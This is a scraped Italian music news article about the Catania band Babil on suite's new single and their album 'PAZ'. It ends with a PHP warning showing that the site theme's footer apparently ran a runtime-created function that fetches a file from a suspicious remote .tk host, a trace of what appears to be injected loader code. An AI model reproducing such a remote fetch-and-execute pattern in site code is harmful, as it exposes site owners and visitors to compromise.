Musica > Nuovo singolo per i Babil on suite

Nuovo singolo per i Babil on suite

Dopo il successo del singolo estivo “Boa Babil On” feat. Mario Venuti, i Babil on suite, la band di musicisti, dj e compositori catanesi lancia un brano che celebra un pop caratterizzato dalle voci di Caterina Anastasi e Manola Micalizzi e dal funky rap di Geo Jhonson. Il pezzo è capace di attingere ai più disparati stili musicali aldilà di ogni collocazione temporale.
«Come un palloncino legato a un sasso. Non c’è maggior solitudine di vivere in due restando legati al passato, invece di aprirsi al nuovo. Finché una vocina impertinente ti suggerisce … Call Another Boy». Babil on suite
La leggerezza del pianoforte alla Praise You e il groove delle percussioni di Rapper’s Delight tratteggiano il sound del brano scelto come singolo che anticipa l’album “PAZ” e ne caratterizza l’essenza.
Il video del singolo, diretto da Roberto Biadi, sarà online dal 18 gennaio sui canali web ufficiali del gruppo.
Il titolo del disco PAZ” (Puntoeacapo/ A1 Entertainement) proviene dal portoghese “Pace”, una “pace artistica” che riunisce in maniera corale più stili e lingue. La tracklist è un viaggio coinvolgente, ammiccante, concettuale. L’album è un contenitore sonoro del percorso artistico dei Babil on Suite dove acoustic drums sono in sintonia con i clap delle drum machine, e gli strumenti tradizionali world si fondono con i sample campionati mantengono la leggerezza di natura Pop.

Il 18 gennaio i BABIL ON SUITE incontreranno il pubblico e racconteranno “PAZ” al MA Catania Via vela 6.

Da venerdì 11 gennaio, l’album sarà disponibile in pre-order su iTunes e in pre-save su Spotify, tutti coloro che acquisteranno il disco otterranno subito come instant gratification il primo singolo.

Radio date: 11 gennaio 2018
Pubblicazione album: 18 gennaio 2018

Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\hosting\apache\radiotaormina\wp-content\themes\theme1214\footer.php(32) : runtime-created function on line 1